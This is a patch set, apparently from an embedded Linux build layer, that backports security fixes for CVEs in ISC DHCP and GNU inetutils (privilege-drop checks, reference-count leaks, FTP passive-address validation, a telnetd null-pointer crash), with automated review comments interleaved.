2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 6 Oct 2022 09:39:18 +0530
4Subject: [PATCH] CVE-2022-2928
5
6Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
7CVE: CVE-2022-2928
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 common/options.c | 7 +++++
11 common/tests/option_unittest.c | 54 ++++++++++++++++++++++++++++++++++
12 2 files changed, 61 insertions(+)
13
14diff --git a/common/options.c b/common/options.c
15index a7ed84c..4e53bb4 100644
16--- a/common/options.c
17+++ b/common/options.c
18@@ -4452,6 +4452,8 @@ add_option(struct option_state *options,
19 if (!option_cache_allocate(&oc, MDL)) {
20 log_error("No memory for option cache adding %s (option %d).",
21 option->name, option_num);
22+ /* Get rid of reference created during hash lookup. */
23+ option_dereference(&option, MDL);
24 return 0;
25 }
26
27@@ -4463,6 +4465,8 @@ add_option(struct option_state *options,
28 MDL)) {
29 log_error("No memory for constant data adding %s (option %d).",
30 option->name, option_num);
31+ /* Get rid of reference created during hash lookup. */
32+ option_dereference(&option, MDL);
33 option_cache_dereference(&oc, MDL);
34 return 0;
35 }
36@@ -4471,6 +4475,9 @@ add_option(struct option_state *options,
37 save_option(&dhcp_universe, options, oc);
38 option_cache_dereference(&oc, MDL);
39
40+ /* Get rid of reference created during hash lookup. */
41+ option_dereference(&option, MDL);
42+
43 return 1;
44 }
45
46diff --git a/common/tests/option_unittest.c b/common/tests/option_unittest.c
47index cd52cfb..690704d 100644
48--- a/common/tests/option_unittest.c
49+++ b/common/tests/option_unittest.c
50@@ -130,6 +130,59 @@ ATF_TC_BODY(pretty_print_option, tc)
51 }
52
53
54+ATF_TC(add_option_ref_cnt);
55+
56+ATF_TC_HEAD(add_option_ref_cnt, tc)
57+{
58+ atf_tc_set_md_var(tc, "descr",
59+ "Verify add_option() does not leak option ref counts.");
60+}
61+
62+ATF_TC_BODY(add_option_ref_cnt, tc)
63+{
64+ struct option_state *options = NULL;
65+ struct option *option = NULL;
66+ unsigned int cid_code = DHO_DHCP_CLIENT_IDENTIFIER;
67+ char *cid_str = "1234";
68+ int refcnt_before = 0;
69+
70+ // Look up the option we're going to add.
71+ initialize_common_option_spaces();
72+ if (!option_code_hash_lookup(&option, dhcp_universe.code_hash,
73+ &cid_code, 0, MDL)) {
74+ atf_tc_fail("cannot find option definition?");
75+ }
76+
77+ // Get the option's reference count before we call add_options.
78+ refcnt_before = option->refcnt;
79+
80+ // Allocate a option_state to which to add an option.
81+ if (!option_state_allocate(&options, MDL)) {
82+ atf_tc_fail("cannot allocat options state");
83+ }
84+
85+ // Call add_option() to add the option to the option state.
86+ if (!add_option(options, cid_code, cid_str, strlen(cid_str))) {
87+ atf_tc_fail("add_option returned 0");
88+ }
89+
90+ // Verify that calling add_option() only adds 1 to the option ref count.
91+ if (option->refcnt != (refcnt_before + 1)) {
92+ atf_tc_fail("after add_option(), count is wrong, before %d, after: %d",
93+ refcnt_before, option->refcnt);
94+ }
95+
96+ // Derefrence the option_state, this should reduce the ref count to
97+ // it's starting value.
98+ option_state_dereference(&options, MDL);
99+
100+ // Verify that dereferencing option_state restores option ref count.
101+ if (option->refcnt != refcnt_before) {
102+ atf_tc_fail("after state deref, count is wrong, before %d, after: %d",
103+ refcnt_before, option->refcnt);
104+ }
105+}
106+
107 /* This macro defines main() method that will call specified
108 test cases. tp and simple_test_case names can be whatever you want
109 as long as it is a valid variable identifier. */
110@@ -137,6 +190,7 @@ ATF_TP_ADD_TCS(tp)
111 {
112 ATF_TP_ADD_TC(tp, option_refcnt);
113 ATF_TP_ADD_TC(tp, pretty_print_option);
114+ ATF_TP_ADD_TC(tp, add_option_ref_cnt);
115
116 return (atf_no_error());
117 }
118--
1192.25.1
120
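Review bot: The new test add_option_ref_cnt takes its own reference with `option_code_hash_lookup(&option, ...)` and never releases it, which is the same pattern the fix removes from add_option(). Ending the test body with `option_dereference(&option, MDL);` would keep the test from leaking the count it is measuring. In add_option() itself the dereference is repeated on each of the three exits shown; the function starts outside the hunks, so any earlier return after the lookup cannot be checked from here.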
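--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
@@ -0,0 +1,40 @@
+From 5c959166ebee7605e2048de573f2475b4d731ff7 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:42:59 +0530
+Subject: [PATCH] CVE-2022-2929
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2929
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/common/options.c b/common/options.c
+index 4e53bb4..28800fc 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -454,16 +454,16 @@ int fqdn_universe_decode (struct option_state *options,
+ while (s < &bp -> data[0] + length + 2) {
+ len = *s;
+ if (len > 63) {
+- log_info ("fancy bits in fqdn option");
+- return 0;
++ log_info ("label length exceeds 63 in fqdn option");
++ goto bad;
+ }
+ if (len == 0) {
+ terminated = 1;
+ break;
+ }
+ if (s + len > &bp -> data [0] + length + 3) {
+- log_info ("fqdn tag longer than buffer");
+- return 0;
++ log_info ("fqdn label longer than buffer");
++ goto bad;
+ }
+
+ if (first_len == 0) {
+--
+2.25.1
+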
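--- a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
+++ b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
@@ -10,6 +10,9 @@ SRC_URI += "file://0001-define-macro-_PATH_DHCPD_CONF-and-_PATH_DHCLIENT_CON.pat
  file://0012-dhcp-correct-the-intention-for-xml2-lib-search.patch \
  file://0013-fixup_use_libbind.patch \
  file://0001-workaround-busybox-limitation-in-linux-dhclient-script.patch \
+ file://CVE-2021-25217.patch \
+ file://CVE-2022-2928.patch \
+ file://CVE-2022-2929.patch \
 "
 
 SRC_URI[md5sum] = "2afdaf8498dc1edaf3012efdd589b3e1"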
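--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
@@ -0,0 +1,283 @@
+From 703418fe9d2e3b1e8d594df5788d8001a8116265 Mon Sep 17 00:00:00 2001
+From: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Date: Fri, 30 Jun 2023 19:02:45 +0200
+Subject: [PATCH] CVE-2023-40303: ftpd,rcp,rlogin,rsh,rshd,uucpd: fix: check
+ set*id() return values
+
+Several setuid(), setgid(), seteuid() and setguid() return values
+were not checked in ftpd/rcp/rlogin/rsh/rshd/uucpd code potentially
+leading to potential security issues.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=e4e65c03f4c11292a3e40ef72ca3f194c8bffdd6]
+Signed-off-by: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Signed-off-by: Simon Josefsson <simon@josefsson.org>
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ftpd/ftpd.c | 10 +++++++---
+ src/rcp.c | 39 +++++++++++++++++++++++++++++++++------
+ src/rlogin.c | 11 +++++++++--
+ src/rsh.c | 25 +++++++++++++++++++++----
+ src/rshd.c | 20 +++++++++++++++++---
+ src/uucpd.c | 15 +++++++++++++--
+ 6 files changed, 100 insertions(+), 20 deletions(-)
+
+diff --git a/ftpd/ftpd.c b/ftpd/ftpd.c
+index 5db88d0..b52b122 100644
+--- a/ftpd/ftpd.c
++++ b/ftpd/ftpd.c
+@@ -862,7 +862,9 @@ end_login (struct credentials *pcred)
+ char *remotehost = pcred->remotehost;
+ int atype = pcred->auth_type;
+
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
++
+ if (pcred->logged_in)
+ {
+ logwtmp_keep_open (ttyline, "", "");
+@@ -1151,7 +1153,8 @@ getdatasock (const char *mode)
+
+ if (data >= 0)
+ return fdopen (data, mode);
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
+ s = socket (ctrl_addr.ss_family, SOCK_STREAM, 0);
+ if (s < 0)
+ goto bad;
+@@ -1978,7 +1981,8 @@ passive (int epsv, int af)
+ else /* !AF_INET6 */
+ ((struct sockaddr_in *) &pasv_addr)->sin_port = 0;
+
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
+ if (bind (pdata, (struct sockaddr *) &pasv_addr, pasv_addrlen) < 0)
+ {
+ if (seteuid ((uid_t) cred.uid))
+diff --git a/src/rcp.c b/src/rcp.c
+index bafa35f..366295c 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,14 +347,23 @@ main (int argc, char *argv[])
+ if (from_option)
+ { /* Follow "protocol", send data. */
+ response ();
+- setuid (userid);
++
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ source (argc, argv);
+ exit (errs);
+ }
+
+ if (to_option)
+ { /* Receive data. */
+- setuid (userid);
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ sink (argc, argv);
+ exit (errs);
+ }
+@@ -539,7 +548,11 @@ toremote (char *targ, int argc, char *argv[])
+ if (response () < 0)
+ exit (EXIT_FAILURE);
+ free (bp);
+- setuid (userid);
++
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+ }
+ source (1, argv + i);
+ close (rem);
+@@ -634,7 +647,12 @@ tolocal (int argc, char *argv[])
+ ++errs;
+ continue;
+ }
+- seteuid (userid);
++
++ if (seteuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+ sslen = sizeof (ss);
+ (void) getpeername (rem, (struct sockaddr *) &ss, &sslen);
+@@ -647,7 +665,12 @@ tolocal (int argc, char *argv[])
+ #endif
+ vect[0] = target;
+ sink (1, vect);
+- seteuid (effuid);
++
++ if (seteuid (effuid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
+ close (rem);
+ rem = -1;
+ #ifdef SHISHI
+@@ -1453,7 +1476,11 @@ susystem (char *s, int userid)
+ return (127);
+
+ case 0:
+- setuid (userid);
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ execl (PATH_BSHELL, "sh", "-c", s, NULL);
+ _exit (127);
+ }
+diff --git a/src/rlogin.c b/src/rlogin.c
+index e5e11a7..6b38901 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -649,8 +649,15 @@ try_connect:
+ /* Now change to the real user ID. We have to be set-user-ID root
+ to get the privileged port that rcmd () uses. We now want, however,
+ to run as the real user who invoked us. */
+- seteuid (uid);
+- setuid (uid);
++ if (seteuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
++ if (setuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+
+ doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
+
+diff --git a/src/rsh.c b/src/rsh.c
+index bd70372..b451a70 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,8 +278,17 @@ main (int argc, char **argv)
+ {
+ if (asrsh)
+ *argv = (char *) "rlogin";
+- seteuid (getuid ());
+- setuid (getuid ());
++
++ if (seteuid (getuid ()) == -1)
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
++
++ if (setuid (getuid ()) == -1)
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
++
+ execv (PATH_RLOGIN, argv);
+ error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+ }
+@@ -543,8 +552,16 @@ try_connect:
+ error (0, errno, "setsockopt DEBUG (ignored)");
+ }
+
+- seteuid (uid);
+- setuid (uid);
++ if (seteuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
++
++ if (setuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
++
+ #ifdef HAVE_SIGACTION
+ sigemptyset (&sigs);
+ sigaddset (&sigs, SIGINT);
+diff --git a/src/rshd.c b/src/rshd.c
+index b824a10..8cdcd06 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,8 +1848,18 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ pwd->pw_shell = PATH_BSHELL;
+
+ /* Set the gid, then uid to become the user specified by "locuser" */
+- setegid ((gid_t) pwd->pw_gid);
+- setgid ((gid_t) pwd->pw_gid);
++ if (setegid ((gid_t) pwd->pw_gid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setegid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
++
++ if (setgid ((gid_t) pwd->pw_gid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setgid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
++
+ #ifdef HAVE_INITGROUPS
+ initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
+ #endif
+@@ -1871,7 +1881,11 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ }
+ #endif /* WITH_PAM */
+
+- setuid ((uid_t) pwd->pw_uid);
++ if (setuid ((uid_t) pwd->pw_uid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setuid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ /* We'll execute the client's command in the home directory
+ * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 55c3d44..6aba294 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,7 +254,12 @@ doit (struct sockaddr *sap, socklen_t salen)
+ sprintf (Username, "USER=%s", user);
+ sprintf (Logname, "LOGNAME=%s", user);
+ dologin (pw, sap, salen);
+- setgid (pw->pw_gid);
++
++ if (setgid (pw->pw_gid) == -1)
++ {
++ fprintf (stderr, "setgid() failed");
++ return;
++ }
+ #ifdef HAVE_INITGROUPS
+ initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -263,7 +268,13 @@ doit (struct sockaddr *sap, socklen_t salen)
+ fprintf (stderr, "Login incorrect.");
+ return;
+ }
+- setuid (pw->pw_uid);
++
++ if (setuid (pw->pw_uid) == -1)
++ {
++ fprintf (stderr, "setuid() failed");
++ return;
++ }
++
+ execl (uucico_location, "uucico", NULL);
+ perror ("uucico server: execl");
+ }
+--
+2.25.1
+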
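Review bot: The `initgroups()` calls that sit between the newly checked `setgid()` and `setuid()` calls are still unchecked, in the `src/rshd.c` hunk (`initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */`) and in the `src/uucpd.c` hunk. If that call fails, the process keeps the supplementary groups it started with while its uid and gid change, so the privilege drop is only partial; the same treatment as its neighbours fits, e.g. `if (initgroups (pwd->pw_name, pwd->pw_gid) == -1) exit (EXIT_FAILURE);`. In `src/rcp.c` the check after `sink (1, vect)` guards `seteuid (effuid)`, which restores the saved effective uid, so the message `Could not drop privileges` is misleading there, and the rcp and rlogin calls pass `0` rather than `errno` to `error ()`, unlike `src/rsh.c`. Since this is a backport, these points are best raised upstream as well; every enclosing function continues outside its hunk.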
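--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
@@ -0,0 +1,254 @@
+From 70fe022f9dac760eaece0228cad17e3d29a57fb8 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Mon, 31 Jul 2023 13:59:05 +0200
+Subject: [PATCH] CVE-2023-40303: Indent changes in previous commit.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=9122999252c7e21eb7774de11d539748e7bdf46d]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/rcp.c | 42 ++++++++++++++++++++++++------------------
+ src/rlogin.c | 12 ++++++------
+ src/rsh.c | 24 ++++++++++++------------
+ src/rshd.c | 24 ++++++++++++------------
+ src/uucpd.c | 16 ++++++++--------
+ 5 files changed, 62 insertions(+), 56 deletions(-)
+
+diff --git a/src/rcp.c b/src/rcp.c
+index cdcf8500..652f22e6 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,9 +347,10 @@ main (int argc, char *argv[])
+ response ();
+
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ source (argc, argv);
+ exit (errs);
+@@ -358,9 +359,10 @@ main (int argc, char *argv[])
+ if (to_option)
+ { /* Receive data. */
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ sink (argc, argv);
+ exit (errs);
+@@ -548,9 +550,10 @@ toremote (char *targ, int argc, char *argv[])
+ free (bp);
+
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+ }
+ source (1, argv + i);
+ close (rem);
+@@ -645,9 +648,10 @@ tolocal (int argc, char *argv[])
+ }
+
+ if (seteuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (seteuid() failed)");
++ }
+
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+ sslen = sizeof (ss);
+@@ -663,9 +667,10 @@ tolocal (int argc, char *argv[])
+ sink (1, vect);
+
+ if (seteuid (effuid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (seteuid() failed)");
++ }
+
+ close (rem);
+ rem = -1;
+@@ -1465,9 +1470,10 @@ susystem (char *s, int userid)
+
+ case 0:
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ execl (PATH_BSHELL, "sh", "-c", s, NULL);
+ _exit (127);
+diff --git a/src/rlogin.c b/src/rlogin.c
+index c543de0c..4360202f 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -648,14 +648,14 @@ try_connect:
+ to get the privileged port that rcmd () uses. We now want, however,
+ to run as the real user who invoked us. */
+ if (seteuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
+
+ if (setuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+
+ doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
+
+diff --git a/src/rsh.c b/src/rsh.c
+index 6f60667d..179b47cd 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,14 +278,14 @@ main (int argc, char **argv)
+ *argv = (char *) "rlogin";
+
+ if (seteuid (getuid ()) == -1)
+- {
+- error (EXIT_FAILURE, errno, "seteuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
+
+ if (setuid (getuid ()) == -1)
+- {
+- error (EXIT_FAILURE, errno, "setuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
+
+ execv (PATH_RLOGIN, argv);
+ error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+@@ -551,14 +551,14 @@ try_connect:
+ }
+
+ if (seteuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, errno, "seteuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
+
+ if (setuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, errno, "setuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
+
+ #ifdef HAVE_SIGACTION
+ sigemptyset (&sigs);
+diff --git a/src/rshd.c b/src/rshd.c
+index 707790e7..3a153a18 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,16 +1848,16 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+
+ /* Set the gid, then uid to become the user specified by "locuser" */
+ if (setegid ((gid_t) pwd->pw_gid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setegid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setegid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ if (setgid ((gid_t) pwd->pw_gid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setgid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setgid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ #ifdef HAVE_INITGROUPS
+ initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
+@@ -1881,10 +1881,10 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ #endif /* WITH_PAM */
+
+ if (setuid ((uid_t) pwd->pw_uid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setuid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setuid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ /* We'll execute the client's command in the home directory
+ * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 29cfce35..fde7b9c9 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,10 +254,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+ dologin (pw, sap, salen);
+
+ if (setgid (pw->pw_gid) == -1)
+- {
+- fprintf (stderr, "setgid() failed");
+- return;
+- }
++ {
++ fprintf (stderr, "setgid() failed");
++ return;
++ }
+ #ifdef HAVE_INITGROUPS
+ initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -268,10 +268,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+ }
+
+ if (setuid (pw->pw_uid) == -1)
+- {
+- fprintf (stderr, "setuid() failed");
+- return;
+- }
++ {
++ fprintf (stderr, "setuid() failed");
++ return;
++ }
+
+ execl (uucico_location, "uucico", NULL);
+ perror ("uucico server: execl");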
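--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
@@ -0,0 +1,67 @@
+From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Fri, 17 Dec 2021 21:52:18 -0800
+Subject: [PATCH] ftp: check that PASV/LSPV addresses match.
+
+* NEWS: Mention change.
+* ftp/ftp.c (initconn): Validate returned addresses.
+
+CVE: CVE-2021-40491
+
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd]
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ ftp/ftp.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ftp/ftp.c b/ftp/ftp.c
+index 9813586..7c72cb2 100644
+--- a/ftp/ftp.c
++++ b/ftp/ftp.c
+@@ -1344,6 +1344,13 @@ initconn (void)
+ uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr;
+ pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]);
+ }
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv4 */
+ else /* IPv6 */
+ {
+@@ -1374,6 +1381,13 @@ initconn (void)
+ pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]);
+ pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]);
+ }
++ if (data_addr_sa6->sin6_addr.s6_addr
++ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv6 */
+ }
+ else /* !EPSV && !LPSV */
+@@ -1394,6 +1408,13 @@ initconn (void)
+ | ((a2 & 0xff) << 8) | (a3 & 0xff) );
+ data_addr_sa4->sin_port =
+ htons (((p0 & 0xff) << 8) | (p1 & 0xff));
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* PASV */
+ else
+ {
+--
+2.25.1
+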
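Review bot: The IPv6 check added in the LPSV branch of `initconn` compares `data_addr_sa6->sin6_addr.s6_addr` with the control connection's `s6_addr` using `!=`, and `s6_addr` is an array, so both operands decay to pointers and two distinct objects always compare unequal. As written, that branch would print `Passive mode address mismatch.` for every IPv6 LPSV reply; it fails closed, but it does not validate the address and would break legitimate transfers. Compare the bytes instead: `if (memcmp (&data_addr_sa6->sin6_addr, &((struct sockaddr_in6 *) &hisctladdr)->sin6_addr, sizeof (struct in6_addr)) != 0)`. The two IPv4 checks compare the `s_addr` values directly; `initconn` starts and ends outside the hunks, so the address family of `hisctladdr` at these points cannot be confirmed from here.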
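--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
@@ -0,0 +1,54 @@
+From eaae65aac967f9628787dca4a2501ca860bb6598 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Mon, 26 Sep 2022 22:05:07 +0200
+Subject: [PATCH] telnetd: Handle early IAC EC or IAC EL receipt
+
+Fix telnetd crash if the first two bytes of a new connection
+are 0xff 0xf7 (IAC EC) or 0xff 0xf8 (IAC EL).
+
+The problem was reported in:
+<https://pierrekim.github.io/blog/2022-08-24-2-byte-dos-freebsd-netbsd-telnetd-netkit-telnetd-inetutils-telnetd-kerberos-telnetd.html>.
+
+* NEWS: Mention fix.
+* telnetd/state.c (telrcv): Handle zero slctab[SLC_EC].sptr and
+zero slctab[SLC_EL].sptr.
+
+CVE: CVE-2022-39028
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=fae8263e467380483c28513c0e5fac143e46f94f]
+Signed-off-by: Minjae Kim<flowergom@gmail.com>
+---
+ telnetd/state.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/telnetd/state.c b/telnetd/state.c
+index 2184bca..7948503 100644
+--- a/telnetd/state.c
++++ b/telnetd/state.c
+@@ -314,15 +314,21 @@ telrcv (void)
+ case EC:
+ case EL:
+ {
+- cc_t ch;
++ cc_t ch = (cc_t) (_POSIX_VDISABLE);
+
+ DEBUG (debug_options, 1, printoption ("td: recv IAC", c));
+ ptyflush (); /* half-hearted */
+ init_termbuf ();
+ if (c == EC)
+- ch = *slctab[SLC_EC].sptr;
++ {
++ if (slctab[SLC_EC].sptr)
++ ch = *slctab[SLC_EC].sptr;
++ }
+ else
+- ch = *slctab[SLC_EL].sptr;
++ {
++ if (slctab[SLC_EL].sptr)
++ ch = *slctab[SLC_EL].sptr;
++ }
+ if (ch != (cc_t) (_POSIX_VDISABLE))
+ pty_output_byte ((unsigned char) ch);
+ break;
+--
+2.25.1
+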
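Review bot: The reason `sptr` can be null is not recorded in `telrcv`: the new guards `if (slctab[SLC_EC].sptr)` and `if (slctab[SLC_EL].sptr)` silently leave `ch` at `_POSIX_VDISABLE`. A comment above `if (c == EC)`, such as `/* sptr may still be NULL when IAC EC/EL is the first thing a client sends; ch then stays disabled and nothing is written. */`, would keep a later cleanup from removing the checks. The patch message still lists a NEWS change, but the diffstat covers only `telnetd/state.c`, so that line no longer describes this backport.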
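--- a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
+++ b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
@@ -23,6 +23,10 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \
  file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \
  file://0001-rcp-fix-to-work-with-large-files.patch \
  file://fix-buffer-fortify-tfpt.patch \
+ file://CVE-2021-40491.patch \
+ file://CVE-2022-39028.patch \
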